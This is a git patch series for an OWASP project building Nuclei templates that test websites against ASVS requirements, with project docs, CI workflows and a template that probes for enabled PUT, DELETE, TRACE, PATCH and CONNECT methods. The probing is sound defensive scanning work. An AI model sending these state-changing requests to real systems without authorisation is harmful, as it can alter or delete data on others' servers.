From b81baa1b790ad66e05b7bc1cb78f8c2ac7378516 Mon Sep 17 00:00:00 2001 From: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> Date: Wed, 24 May 2023 17:37:35 +0330 Subject: [PATCH 001/129] Update info.md update small details in side bar --- info.md | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/info.md b/info.md index 60950a4..35d4f69 100644 --- a/info.md +++ b/info.md @@ -1,13 +1,11 @@ ### ASVS Security Evaluation Templates with Nuclei Information * [Incubator Project](#) -* [Type of Project](#) * [Version 0.0.0](#) -* [Builder](#) +* [Defender](#) * [Breaker](#) -### Downloads or Social Links -* [Download](#) -* [Meetup](#) +### Community +* [Slack Channel](https://owasp.slack.com/archives/C052939BZ43) ### Code Repository * [repo](#) From 3439610a0b40cc6a48e1272b2a14f08d8c1248ef Mon Sep 17 00:00:00 2001 From: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> Date: Sun, 28 May 2023 07:37:44 +0330 Subject: [PATCH 002/129] Update index.md add Licensing section --- index.md | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/index.md b/index.md index 6992855..79c808c 100644 --- a/index.md +++ b/index.md @@ -20,3 +20,7 @@ tags: This is a space-delimited list of tags you associate with your project or level: For projects, this is your project level (2 - Incubator, 3 - Lab, 3.5 - Production, 4 - Flagship) type: code, tool, documentation, or other +Licensing +https://img.shields.io/github/license/cont/https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei + +This program is free software: You can redistribute it and/or modify it under the terms of the MIT License. From 9c70535ef4d5e0d1271fe45a674b5583dcdc025e Mon Sep 17 00:00:00 2001 From: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> Date: Sun, 28 May 2023 07:59:31 +0330 Subject: [PATCH 003/129] Update index.md --- index.md | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/index.md b/index.md index 79c808c..e299832 100644 --- a/index.md +++ b/index.md @@ -20,7 +20,10 @@ tags: This is a space-delimited list of tags you associate with your project or level: For projects, this is your project level (2 - Incubator, 3 - Lab, 3.5 - Production, 4 - Flagship) type: code, tool, documentation, or other -Licensing -https://img.shields.io/github/license/cont/https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei + + + +## header H2 +[](https://img.shields.io/github/license/cont/https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei) This program is free software: You can redistribute it and/or modify it under the terms of the MIT License. From a92a1a729a3e70df6eefc12e365d73854893be26 Mon Sep 17 00:00:00 2001 From: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> Date: Sun, 28 May 2023 08:00:36 +0330 Subject: [PATCH 004/129] Update index.md --- index.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/index.md b/index.md index e299832..841704a 100644 --- a/index.md +++ b/index.md @@ -23,7 +23,7 @@ type: code, tool, documentation, or other -## header H2 +## Licensing [](https://img.shields.io/github/license/cont/https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei) This program is free software: You can redistribute it and/or modify it under the terms of the MIT License. From 378ce1521394e9bcfb2ce1dc6f0153c3d8870c0f Mon Sep 17 00:00:00 2001 From: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> Date: Sun, 28 May 2023 08:25:43 +0330 Subject: [PATCH 005/129] Update info.md add link to the github repo --- info.md | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/info.md b/info.md index 35d4f69..0338027 100644 --- a/info.md +++ b/info.md @@ -4,11 +4,17 @@ * [Defender](#) * [Breaker](#) +### Classification +* Tool + ### Community * [Slack Channel](https://owasp.slack.com/archives/C052939BZ43) +### Statistics +* [Daily Project Stats](#) + ### Code Repository -* [repo](#) +* [repo](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei) ### Change Log * [changes](#) From 05b697058d978b039ba3fac3a94d9ced8121a03f Mon Sep 17 00:00:00 2001 From: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> Date: Sun, 28 May 2023 09:00:22 +0330 Subject: [PATCH 006/129] Create README.md --- README.md | 1 + 1 file changed, 1 insertion(+) create mode 100644 README.md diff --git a/README.md b/README.md new file mode 100644 index 0000000..8b13789 --- /dev/null +++ b/README.md @@ -0,0 +1 @@ + From fc61924d00ae35eb7ad0f4d773b4eb10466c4362 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sun, 28 May 2023 09:37:57 +0330 Subject: [PATCH 007/129] Create MIT LICENSE --- LICENSE | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 LICENSE diff --git a/LICENSE b/LICENSE new file mode 100644 index 0000000..636d84b --- /dev/null +++ b/LICENSE @@ -0,0 +1,21 @@ +MIT License + +Copyright (c) 2023 OWASP + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. From bdbca99f8907143d16e55e6b650dff28d97e21b9 Mon Sep 17 00:00:00 2001 From: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> Date: Mon, 29 May 2023 07:59:43 +0330 Subject: [PATCH 008/129] Update index.md Signed-off-by: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> --- index.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/index.md b/index.md index 841704a..e433e37 100644 --- a/index.md +++ b/index.md @@ -24,6 +24,6 @@ type: code, tool, documentation, or other ## Licensing -[](https://img.shields.io/github/license/cont/https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei) +[![alt-text](https://img.shields.io/github/license/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/main/LICENSE) This program is free software: You can redistribute it and/or modify it under the terms of the MIT License. From 0588e75d2775c10289d0b3d75bd54870165212ca Mon Sep 17 00:00:00 2001 From: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> Date: Fri, 16 Jun 2023 12:58:32 +0330 Subject: [PATCH 009/129] Update index.md add project desc Signed-off-by: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> --- index.md | 20 +++++--------------- 1 file changed, 5 insertions(+), 15 deletions(-) diff --git a/index.md b/index.md index e433e37..2f02e06 100644 --- a/index.md +++ b/index.md @@ -2,26 +2,16 @@ layout: col-sidebar title: OWASP ASVS Security Evaluation Templates with Nuclei -tags: example-tag +tags: asvs-security-evaluation-templates-with-nuclei nuclei nuclei-templates asvs asvs-evaluation PoC-generator vulnerablity level: 2 -type: -pitch: A very brief, one-line description of your project +type: tool +pitch: This project aims to develop nuclei templates for evaluating OWASP Application Security Verification Standard (ASVS) on websites. --- -This is an example of a Project or Chapter Page. Please change these items to indicate the actual information you wish to present. In addition to this information, the 'front-matter' above this text should be modified to reflect your actual information. An explanation of each of the front-matter items is below: - -layout: This is the layout used by project and chapter pages. You should leave this value as col-sidebar - -title: This is the title of your project or chapter page, usually the name. For example, OWASP Zed Attack Proxy or OWASP Baltimore - -tags: This is a space-delimited list of tags you associate with your project or chapter. If you are using tabs, at least one of these tags should be unique in order to be used in the tabs files (an example tab is included in this repo) - -level: For projects, this is your project level (2 - Incubator, 3 - Lab, 3.5 - Production, 4 - Flagship) - -type: code, tool, documentation, or other - +This project aims to develop nuclei templates for evaluating OWASP Application Security Verification Standard (ASVS) on websites and will involve creating templates that can be used to evaluate ASVS on websites, documenting the use of the templates, and designing and implementing a user interface for easy navigation and use of the templates. The templates and user interface will be tested for accuracy and usability, and once finalized, they will be made available for use. User feedback and usage of the templates and user interface will be monitored and analyzed, and updates will be made to the templates and user interface based on this feedback and usage. Finally, the project will be documented for future reference. +It's important to note that Since the implementation methods and frameworks used in web application design are very diverse, in this project, we will consider the existing best practice designs and develop nuclei templates based on them. ## Licensing [![alt-text](https://img.shields.io/github/license/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/main/LICENSE) From 2ec85db9e4639a01b8cf6c9bc77e34225b65025f Mon Sep 17 00:00:00 2001 From: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> Date: Fri, 16 Jun 2023 15:05:54 +0330 Subject: [PATCH 010/129] Create CONTRIBUTING.md add 'how to contribute' file Signed-off-by: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> --- CONTRIBUTING.md | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 CONTRIBUTING.md diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md new file mode 100644 index 0000000..526ffda --- /dev/null +++ b/CONTRIBUTING.md @@ -0,0 +1,16 @@ + +## Contributing + +If you have any idea to improve templates or want to share experience and give feedback on this project, we'd love to hear from you in following ways: + + +### Asking Questions +You can use either Github [Discussions](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/discussions) or our [Slack channel](https://owasp.slack.com/archives/C052939BZ43) to ask questions. + +### Create issues + +Before raising pull requests, please create an [Issue](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/issues) first to be discussed for missing requirements, content or errors. Please explain the issue in detail including references if available and suggest where it could be added. + +### Open a Pull Request +- Your pull request may be merged after review. +- Commits must be [signed off](https://git-scm.com/docs/git-commit#Documentation/git-commit.txt--s) to indicate agreement with [Developer Certificate of Origin (DCO)](https://developercertificate.org/). From bbe49f8b39543f3a3ed98ec7688520d7a0d09dde Mon Sep 17 00:00:00 2001 From: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> Date: Fri, 16 Jun 2023 15:12:25 +0330 Subject: [PATCH 011/129] Update and rename tab_example.md to tab_contributing.md add contribution guideline on main owasp website of project Signed-off-by: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> --- tab_contributing.md | 21 +++++++++++++++++++++ tab_example.md | 11 ----------- 2 files changed, 21 insertions(+), 11 deletions(-) create mode 100644 tab_contributing.md delete mode 100644 tab_example.md diff --git a/tab_contributing.md b/tab_contributing.md new file mode 100644 index 0000000..2a82cf5 --- /dev/null +++ b/tab_contributing.md @@ -0,0 +1,21 @@ +--- +title: Contributing +layout: null +tab: true +order: 1 +tags: asvs-security-evaluation-templates-with-nuclei +--- + +## Contributing + +If you are interested in contributing to this project by sharing ideas to improve templates or giving feedback we will be happy to hear from you in project Github [Discussions](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/discussions) or our [Slack channel](https://owasp.slack.com/archives/C052939BZ43). + +For detailed information and guidelines about contributing in "ASVS evaluation template development" please check [CONTRIBUTING.md](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/main/CONTRIBUTING.md) + +### Core Team +The project current core team are: +- [Hamed Salimain](https://github.com/Snbig) (Project Leader) +- [Mohammad Khodaiemehr](https://github.com/m0khd) +- [Amin Naserinia](https://github.com/aminnaseri) +- [Reza Saeedi](https://github.com/Reza-saeedi) +- [Dorna Azhirak](https://github.com/nameddorna) diff --git a/tab_example.md b/tab_example.md deleted file mode 100644 index d29bc45..0000000 --- a/tab_example.md +++ /dev/null @@ -1,11 +0,0 @@ ---- -title: Example -layout: null -tab: true -order: 1 -tags: example-tag ---- - -## Example - -Put whatever you like here: news, screenshots, features, supporters, or remove this file and don't use tabs at all. \ No newline at end of file From 37d3cc148903b6a0be67b5f87bc3f6927eb2699c Mon Sep 17 00:00:00 2001 From: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> Date: Fri, 16 Jun 2023 15:57:58 +0330 Subject: [PATCH 012/129] Update README.md add readme file content Signed-off-by: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> --- README.md | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) diff --git a/README.md b/README.md index 8b13789..b22a866 100644 --- a/README.md +++ b/README.md @@ -1 +1,30 @@ +# OWASP ASVS Security Evaluation Templates with Nuclei + + +This project aims to develop [Nuclei](https://github.com/projectdiscovery/nuclei) templates for evaluating OWASP Application Security Verification Standard ([ASVS](https://owasp.org/www-project-application-security-verification-standard/)) on websites and will involve creating templates that can be used to evaluate ASVS on websites, documenting the use of the templates, and designing and implementing a user interface for easy navigation and use of the templates. + + The goal is to provide security professionals with an easy-to-use set of tools to test their web applications and identify potential vulnerabilities. +#### It's important to note that: +- Since the implementation methods and frameworks used in web application design are very diverse, in this project we will consider the existing best practice designs and develop nuclei templates based on them :) +- Also while these Nuclei templates are designed to help automate the process of evaluating web applications against ASVS requirements, they should not be considered a substitute for manual testing or other security best practices. +- Some templates are developed for a limited or specific scenario and should be modified and perfected according to the needs of the evaluator/user. + +## Licensing +[![alt-text](https://img.shields.io/github/license/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/main/LICENSE) + +This program is free software: You can redistribute it and/or modify it under the terms of the MIT License. + +## Contributing + +Contributions to this repository are welcome and encouraged. If you have created new Nuclei templates that evaluate additional ASVS requirements or have any idea about current templates, we'd love to hear from you in project Github [Discussions](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/discussions) or our [Slack channel](https://owasp.slack.com/archives/C052939BZ43). + +For detailed information and guidelines about contributing in developing template for ASVS evaluation, please check [CONTRIBUTING.md](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/main/CONTRIBUTING.md) + +#### Core Team +The project current core team are: +- [Hamed Salimain](https://github.com/Snbig) (Project Leader) +- [Mohammad Khodaiemehr](https://github.com/m0khd) +- [Amin Naserinia](https://github.com/aminnaseri) +- [Reza Saeedi](https://github.com/Reza-saeedi) +- [Dorna Azhirak](https://github.com/nameddorna) From 5a27a844901eb6c966aadbc7ea7c03c6c6477a2c Mon Sep 17 00:00:00 2001 From: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> Date: Sat, 17 Jun 2023 08:51:50 +0330 Subject: [PATCH 013/129] Update info.md edit sidebar add icons Signed-off-by: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com> --- info.md | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/info.md b/info.md index 0338027..4abe302 100644 --- a/info.md +++ b/info.md @@ -1,11 +1,13 @@ -### ASVS Security Evaluation Templates with Nuclei Information +### Project Information * [Incubator Project](#) * [Version 0.0.0](#) -* [Defender](#) -* [Breaker](#) - + ### Classification -* Tool +* Tool + +### Audience +* Defender +* Breaker ### Community * [Slack Channel](https://owasp.slack.com/archives/C052939BZ43) From 58f77bb738cb360354607b2ee7d759a7714ad071 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 14 Jul 2023 20:48:02 +0330 Subject: [PATCH 014/129] Update README.md Signed-off-by: Hamed Salimian --- README.md | 1 - 1 file changed, 1 deletion(-) diff --git a/README.md b/README.md index b22a866..c714ebb 100644 --- a/README.md +++ b/README.md @@ -23,7 +23,6 @@ For detailed information and guidelines about contributing in developing templat #### Core Team The project current core team are: - [Hamed Salimain](https://github.com/Snbig) (Project Leader) -- [Mohammad Khodaiemehr](https://github.com/m0khd) - [Amin Naserinia](https://github.com/aminnaseri) - [Reza Saeedi](https://github.com/Reza-saeedi) - [Dorna Azhirak](https://github.com/nameddorna) From 86e0d5a93493874a4d673318de62429f4722fa77 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Mon, 17 Jul 2023 13:23:57 +0330 Subject: [PATCH 015/129] Update README.md Signed-off-by: Hamed Salimian --- README.md | 1 - 1 file changed, 1 deletion(-) diff --git a/README.md b/README.md index c714ebb..7037f89 100644 --- a/README.md +++ b/README.md @@ -25,5 +25,4 @@ The project current core team are: - [Hamed Salimain](https://github.com/Snbig) (Project Leader) - [Amin Naserinia](https://github.com/aminnaseri) - [Reza Saeedi](https://github.com/Reza-saeedi) -- [Dorna Azhirak](https://github.com/nameddorna) From f1f8710ae9c0f2960c8ef08fd3ea638612439671 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Thu, 20 Jul 2023 16:20:29 +0330 Subject: [PATCH 016/129] Create syntax-checking.yml Signed-off-by: Hamed Salimian --- .github/workflows/syntax-checking.yml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 .github/workflows/syntax-checking.yml diff --git a/.github/workflows/syntax-checking.yml b/.github/workflows/syntax-checking.yml new file mode 100644 index 0000000..d9fa932 --- /dev/null +++ b/.github/workflows/syntax-checking.yml @@ -0,0 +1,19 @@ +name: ❄️ YAML Lint + +on: + pull_request: + paths: + - '**.yaml' + workflow_dispatch: + +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - name: Yamllint + uses: karancode/yamllint-github-action@v2.1.1 + with: + yamllint_config_filepath: .yamllint + yamllint_strict: false + yamllint_comment: true From 045c48c7eedea094ab107aa46c3ed5301e1789ee Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Thu, 20 Jul 2023 16:24:16 +0330 Subject: [PATCH 017/129] Create template-validate.yml Signed-off-by: Hamed Salimian --- .github/workflows/template-validate.yml | 29 +++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 .github/workflows/template-validate.yml diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml new file mode 100644 index 0000000..6c80cd8 --- /dev/null +++ b/.github/workflows/template-validate.yml @@ -0,0 +1,29 @@ +name: 🛠 Template Validate + +on: + pull_request: + paths: + - '**.yaml' + workflow_dispatch: + +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + fetch-depth: 0 + + - name: Set up Go + uses: actions/setup-go@v4 + with: + go-version: 1.20.x + + - name: nuclei install + run: go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest + + - name: Template Validation + run: | + cp -r ${{ github.workspace }} $HOME + nuclei -duc -validate -allow-local-file-access + nuclei -duc -validate -w ./workflows -allow-local-file-access From 7d5736ff5b4cdc450cc4cdd5d5ea2fea778202e3 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sat, 22 Jul 2023 08:28:01 +0330 Subject: [PATCH 018/129] Create templates folder Signed-off-by: Hamed Salimian --- templates/.gitkeep | 1 + 1 file changed, 1 insertion(+) create mode 100644 templates/.gitkeep diff --git a/templates/.gitkeep b/templates/.gitkeep new file mode 100644 index 0000000..8b13789 --- /dev/null +++ b/templates/.gitkeep @@ -0,0 +1 @@ + From 33deafcfcdf1bff5b3f20021b506d76d5ecb9499 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sat, 22 Jul 2023 08:55:00 +0330 Subject: [PATCH 019/129] Added static vulnerable project as submodule on dev --- .gitmodules | 4 ++++ Vulnerable-Pages | 1 + 2 files changed, 5 insertions(+) create mode 100644 .gitmodules create mode 160000 Vulnerable-Pages diff --git a/.gitmodules b/.gitmodules new file mode 100644 index 0000000..18feab8 --- /dev/null +++ b/.gitmodules @@ -0,0 +1,4 @@ +[submodule "Vulnerable-Pages"] + path = Vulnerable-Pages + url = https://github.com/Snbig/Vulnerable-Pages + branch = dev diff --git a/Vulnerable-Pages b/Vulnerable-Pages new file mode 160000 index 0000000..982975c --- /dev/null +++ b/Vulnerable-Pages @@ -0,0 +1 @@ +Subproject commit 982975c8775116be62cd507660d125e888f17b4a From efe4816307f92a049ca0b57643e8552f27e870a5 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 4 Aug 2023 20:41:33 +0330 Subject: [PATCH 020/129] Create 13.2.1.yaml Signed-off-by: Hamed Salimian --- templates/13.2.1.yaml | 170 ++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 170 insertions(+) create mode 100644 templates/13.2.1.yaml diff --git a/templates/13.2.1.yaml b/templates/13.2.1.yaml new file mode 100644 index 0000000..f0194d3 --- /dev/null +++ b/templates/13.2.1.yaml @@ -0,0 +1,170 @@ +id: asvs_13_2_1 + +info: + name: ASVS 13.2.1 Check + author: Hamed Salimian + severity: high + classification: + cwe-id: CWE-650 + reference: + - https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/06-Test_HTTP_Methods + - https://nmap.org/nsedoc/scripts/http-methods.html + tags: asvs,13.2.1 + description: | + Verify that enabled RESTful HTTP methods are a valid choice for the user or action, such as preventing normal users using DELETE or PUT on protected API or resources. + +http: + - method: OPTIONS + path: + - "{{BaseURL}}" + headers: + Host: "{{Hostname}}" + Cookie: "{{Cookie}}" + extractors: + - type: regex + name: "potentially risky methods (OPTIONS check)" + part: header + regex: + - "(PUT|DELETE|TRACE|PATCH|CONNECT)" + - type: kval + name: "Access-Control-Allow-Methods" + part: header + kval: + - Access_Control_Allow_Methods + matchers: + - type: regex + part: header + regex: + - "(PUT|DELETE|TRACE|PATCH|CONNECT)" + + - raw: + - | + {{to_upper(rand_text_alpha(4))}} {{Path}} HTTP/1.1 + Host: {{Hostname}} + Cookie: {{Cookie}} + extractors: + - type: dsl + internal: true + name: rand_resp + dsl: + - status_code + + - method: PUT + path: + - "{{BaseURL}}" + headers: + Host: "{{Hostname}}" + Cookie: "{{Cookie}}" + body: "HTTP PUT Method is Enabled" + extractors: + - type: dsl + name: "PUT method is Enabled" + dsl: + - status_code + matchers-condition: and + matchers: + - type: status + negative: true + status: + - 405 + - 501 + - type: dsl + dsl: + - "(status_code < 210 && status_code >= 200) && (rand_resp != status_code)" + + - method: DELETE + path: + - "{{BaseURL}}" + headers: + Host: "{{Hostname}}" + Cookie: "{{Cookie}}" + extractors: + - type: dsl + name: "DELETE method is Enabled" + dsl: + - status_code + matchers-condition: and + matchers: + - type: status + negative: true + status: + - 405 + - 501 + - type: dsl + negative: true + dsl: + - "(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" + + - method: TRACE + path: + - "{{BaseURL}}" + headers: + Host: "{{Hostname}}" + Cookie: "{{Cookie}}" + extractors: + - type: dsl + name: "TRACE method is Enabled" + dsl: + - status_code + matchers-condition: and + matchers: + - type: status + negative: true + status: + - 405 + - 501 + - type: dsl + negative: true + dsl: + - "(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" + - type: regex + part: body + regex: + - '^TRACE \S+ HTTP\/[0-9]\.[0-9]' + + - method: PATCH + path: + - "{{BaseURL}}" + headers: + Host: "{{Hostname}}" + Cookie: "{{Cookie}}" + body: "" + extractors: + - type: dsl + name: "PATCH method is Enabled" + dsl: + - status_code + matchers-condition: and + matchers: + - type: status + negative: true + status: + - 405 + - 501 + - type: dsl + negative: true + dsl: + - "(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" + + - method: CONNECT + path: + - "{{BaseURL}}" + headers: + Host: "{{Hostname}}" + Cookie: "{{Cookie}}" + extractors: + - type: dsl + name: "CONNECT method is Enabled" + dsl: + - status_code + matchers-condition: and + matchers: + - type: status + negative: true + status: + - 405 + - 501 + - type: dsl + negative: true + dsl: + - "(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" From 037be1df9221c9b0ef499b502b15b4aa218db9ea Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 4 Aug 2023 20:48:20 +0330 Subject: [PATCH 021/129] Update syntax-checking.yml Add PUSH event to workflow Signed-off-by: Hamed Salimian --- .github/workflows/syntax-checking.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/.github/workflows/syntax-checking.yml b/.github/workflows/syntax-checking.yml index d9fa932..f641b2a 100644 --- a/.github/workflows/syntax-checking.yml +++ b/.github/workflows/syntax-checking.yml @@ -1,6 +1,7 @@ name: ❄️ YAML Lint -on: +on: + push: pull_request: paths: - '**.yaml' From 9c7ae76c2ae54f1cbe7c55a703870f3869977442 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 4 Aug 2023 20:48:49 +0330 Subject: [PATCH 022/129] Update 13.2.1.yaml Signed-off-by: Hamed Salimian --- templates/13.2.1.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/templates/13.2.1.yaml b/templates/13.2.1.yaml index f0194d3..8f1cc9e 100644 --- a/templates/13.2.1.yaml +++ b/templates/13.2.1.yaml @@ -168,3 +168,4 @@ http: negative: true dsl: - "(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" + From 83a42b3b3dae885c883f5fc872cc53bdeb648458 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 4 Aug 2023 20:53:16 +0330 Subject: [PATCH 023/129] Create .yamllint Signed-off-by: Hamed Salimian --- .yamllint | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 .yamllint diff --git a/.yamllint b/.yamllint new file mode 100644 index 0000000..8d5ac48 --- /dev/null +++ b/.yamllint @@ -0,0 +1,25 @@ +--- +extends: default + +ignore: | + .pre-commit-config.yml + .github/ + .git/ + *.yml + +rules: + document-start: disable + line-length: disable + new-lines: disable + new-line-at-end-of-file: disable + truthy: disable + comments: + require-starting-space: true + ignore-shebangs: true + min-spaces-from-content: 1 + empty-lines: + max: 5 + braces: + forbid: true + brackets: + forbid: true From 4023e9b70a1e7c43dad2d9a7d2a6a0e7517cbe3c Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 4 Aug 2023 20:55:27 +0330 Subject: [PATCH 024/129] Update template-validate.yml add PUSH event to workflow Signed-off-by: Hamed Salimian --- .github/workflows/template-validate.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 6c80cd8..0b29477 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -1,6 +1,7 @@ name: 🛠 Template Validate on: + push: pull_request: paths: - '**.yaml' From 0e14a4b883379282777727f5fc8a3a08aca81198 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Fri, 4 Aug 2023 21:04:56 +0330 Subject: [PATCH 025/129] Update 13.2.1.yaml Fix lint issues. Signed-off-by: Hamed Salimian --- templates/13.2.1.yaml | 15 +++++++-------- 1 file changed, 7 insertions(+), 8 deletions(-) diff --git a/templates/13.2.1.yaml b/templates/13.2.1.yaml index 8f1cc9e..94d569e 100644 --- a/templates/13.2.1.yaml +++ b/templates/13.2.1.yaml @@ -35,7 +35,7 @@ http: - type: regex part: header regex: - - "(PUT|DELETE|TRACE|PATCH|CONNECT)" + - "(PUT|DELETE|TRACE|PATCH|CONNECT)" - raw: - | @@ -70,7 +70,7 @@ http: - 501 - type: dsl dsl: - - "(status_code < 210 && status_code >= 200) && (rand_resp != status_code)" + - "(status_code < 210 && status_code >= 200) && (rand_resp != status_code)" - method: DELETE path: @@ -93,8 +93,8 @@ http: - type: dsl negative: true dsl: - - "(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" - + - "(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" + - method: TRACE path: - "{{BaseURL}}" @@ -116,7 +116,7 @@ http: - type: dsl negative: true dsl: - - "(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" + - "(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" - type: regex part: body regex: @@ -144,7 +144,7 @@ http: - type: dsl negative: true dsl: - - "(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" + - "(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" - method: CONNECT path: @@ -167,5 +167,4 @@ http: - type: dsl negative: true dsl: - - "(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" - + - "(status_code < 600 && status_code >= 400) || (rand_resp == status_code)" From 68801e06278d4c3cba06032d1d976919167e216b Mon Sep 17 00:00:00 2001 From: Reza Saeedi Date: Fri, 4 Aug 2023 21:06:13 +0330 Subject: [PATCH 026/129] Create 9-1-3.yaml Signed-off-by: Reza Saeedi --- templates/9-3-1.yaml | 50 ++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 templates/9-3-1.yaml diff --git a/templates/9-3-1.yaml b/templates/9-3-1.yaml new file mode 100644 index 0000000..cbba2d7 --- /dev/null +++ b/templates/9-3-1.yaml @@ -0,0 +1,50 @@ +id: 9-1-3 + +info: + name: Client Communication Security + author: righettod,forgedhallpass,RezaSaeedi + severity: low + reference: + - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/01-Testing_for_Weak_Transport_Layer_Security + - https://wiki.mozilla.org/Security/Server_Side_TLS + - https://cheatsheetseries.owasp.org/cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html + - https://ssl-config.mozilla.org/#config=intermediate + description: | + Verify that only the latest recommended versions of the TLS protocol are enabled, such as TLS 1.2 and TLS 1.3. The latest version of the TLS protocol should be the preferred option. + remediation: | + Update the web server's TLS configuration to disable TLS 1.1,1.0 and SSLv3. + metadata: + max-request: 4 + shodan-query: ssl.version:sslv2 ssl.version:sslv3 ssl.version:tlsv1 ssl.version:tlsv1.1 + tags: ssl,ClientCommunicationSecurity,tls,misconfig,9.1.3,asvsV4 + 